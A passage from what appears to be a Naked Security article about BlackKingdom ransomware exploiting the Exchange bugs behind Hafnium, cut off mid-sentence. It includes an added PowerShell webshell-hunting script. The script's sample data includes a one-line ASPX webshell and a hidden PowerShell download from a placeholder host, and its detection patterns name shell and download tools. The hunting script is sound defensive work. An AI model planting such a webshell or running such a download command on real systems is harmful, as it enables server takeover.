BlackKingdom ransomware still exploiting insecure Exchange servers – Naked Security
It’s three weeks since the word HAFNIUM hit the news.
The word Hafnium refers to a cybergang who are said to focus on stealing data from pretty much anyone and everyone they can infiltrate, across an eclectic range of industry sectors, and this time they hit a sort-of cybercrime jackpot.
The Hafnium crew, it turned out, not only knew about four zero-day vulnerabilities in Microsoft Exchange, but also knew how to exploit these bugs reliably in order to walk into unprotected networks almost at will.
The Exchange bugs didn’t include a remote code execution (RCE) hole that would have given the crooks direct and immediate control of a compromised server, but the bugs did allow the crooks to rig up RCE using a trick known as a webshell.
Greatly simplified, the attack goes like this:
- Exploit the Exchange bugs to write a booby-trapped web file called a webshell onto a vulnerable server.
- Send a web request to the webshell so that the booby-trapped page runs a PowerShell (or similar) command to download further malware, such as a fully-featured backdoor toolkit.
- Enter at will and, very loosely speaking, commit whatever cybercrimes are on today’s “to do” list.
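The two steps above each leave a trace a defender can look for: a script file that should not exist under the Exchange web directories, and the IIS worker process starting a shell. The script below is an added example written for this page, not code from the Naked Security article or from Sophos. The directory list under $ExchangeRoot, the marker patterns, the function names Find-WebshellCandidates and Find-ShellSpawnedByIis, and every sample file and process record it creates are assumptions made for illustration; the demo runs against a scratch folder, not a real server.

```powershell
# Added example (not from the article): two quick hunts that map onto the
# two-step webshell attack described above. Paths, marker lists and all
# sample data are assumptions.

# Where a dropped webshell would normally land. These are the usual Exchange
# front-end locations, but treat them as an assumption and adjust $ExchangeRoot.
$ExchangeRoot = 'C:\Program Files\Microsoft\Exchange Server\V15'
$SearchRoots  = @(
    (Join-Path $ExchangeRoot 'FrontEnd\HttpProxy'),
    (Join-Path $ExchangeRoot 'ClientAccess'),
    'C:\inetpub\wwwroot\aspnet_client'
)

# Markers that together characterise an ASP.NET webshell: the page reads an
# attacker-supplied request value and hands it to something that executes it.
$InputMarkers = @('Request\.Item\[', 'Request\[', 'Request\.Form\[', 'Request\.Headers\[')
$ExecMarkers  = @('Process\.Start', 'eval\(', 'cmd\.exe', 'powershell', 'Assembly\.Load', 'JScript\.Eval')

function Find-WebshellCandidates {
    param(
        [string[]]$Roots,
        # These trees only change at patch time, so anything written after this
        # date is worth a look even without code markers.
        [datetime]$ModifiedSince = (Get-Date).AddDays(-30)
    )
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -File -Include *.aspx, *.asmx, *.ashx -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $text = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue
            if (-not $text) { return }
            $takesInput = @($InputMarkers | Where-Object { $text -match $_ }).Count -gt 0
            $execHits   = @($ExecMarkers  | Where-Object { $text -match $_ })
            $recent     = $file.LastWriteTimeUtc -gt $ModifiedSince.ToUniversalTime()
            $reason = if ($takesInput -and $execHits.Count -gt 0) { 'input+exec' } elseif ($recent) { 'recently-written' } else { $null }
            if ($reason) {
                [pscustomobject]@{
                    Path         = $file.FullName
                    LastWriteUtc = $file.LastWriteTimeUtc
                    SizeBytes    = $file.Length
                    ExecMarkers  = ($execHits -join ',')
                    Reason       = $reason
                }
            }
        }
    }
}

# The IIS worker process hosts Exchange's web front end and has no business
# starting a shell or a download utility. $Events is any list of objects with
# ParentImage/Image/CommandLine fields (Sysmon event 1 or Security 4688 shaped
# data); the records used below are constructed.
function Find-ShellSpawnedByIis {
    param([object[]]$Events)
    $Events | Where-Object {
        $_.ParentImage -match '\\w3wp\.exe$' -and
        $_.Image -match '\\(powershell|pwsh|cmd|certutil|bitsadmin)\.exe$'
    }
}

# ---- constructed demo data (assumption: a scratch folder, not a real server) ----
$demo = Join-Path ([IO.Path]::GetTempPath()) 'webshell-hunt-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null

# A harmless page, dated back a year so it does not count as recently written.
$benign = Join-Path $demo 'logon.aspx'
Set-Content -Path $benign -Value '<%@ Page Language="C#" %><html><body>Sign in</body></html>'
(Get-Item -LiteralPath $benign).LastWriteTimeUtc = (Get-Date).AddYears(-1).ToUniversalTime()

# A webshell-shaped page: a request parameter flows straight into Process.Start.
$shell = Join-Path $demo 'help.aspx'
Set-Content -Path $shell -Value '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>'

$sampleEvents = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\inetsrv\w3wp.exe'
                       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -nop -w hidden -c "iwr http://example.invalid/x -OutFile x.exe"' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\services.exe'
                       Image       = 'C:\Windows\System32\svchost.exe'
                       CommandLine = 'svchost.exe -k netsvcs' }
)

Find-WebshellCandidates -Roots @($demo) | Format-Table -AutoSize
Find-ShellSpawnedByIis -Events $sampleEvents | Format-Table -AutoSize
# On a real server: Find-WebshellCandidates -Roots $SearchRoots | Export-Csv .\webshell-candidates.csv -NoTypeInformation
```

Against the constructed data, the first hunt reports only help.aspx (reason input+exec) and the second only the w3wp.exe to powershell.exe pair. The "recently-written" rule is deliberately loose: a file in these trees that changed outside a patch window deserves a look even if it matches no marker, because a webshell can be obfuscated past any keyword list, while a normal Exchange install does not write new .aspx files on its own.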
Unfortunately, as we explained when this news first broke, the name Hafnium caused fourfold confusion:
- Although Hafnium is often written in ALL CAPS, it’s not an acronym, so it doesn’t stand for something specific that you can protect against and then stand down from.
- Although Hafnium refers to a specific cybergang, the zero-day exploits they were using were already widely known to other criminals, and working examples soon became available online for anyone and everyone to download and use, both for legitimate research and for launching attacks.
- Although Hafnium attacks were associated with Microsoft Exchange in media coverage, the attacks these crooks were carrying out once they got in were not specific to networks using Exchange. The cybercrimes they ultimately committed could be initiated in many other ways.
- Although Hafnium was associated with data exfiltration and thus with potential industrial espionage, intrusions via these Exchange bugs could lead to many other crimes, notably including ransomware attacks.
It’s the last…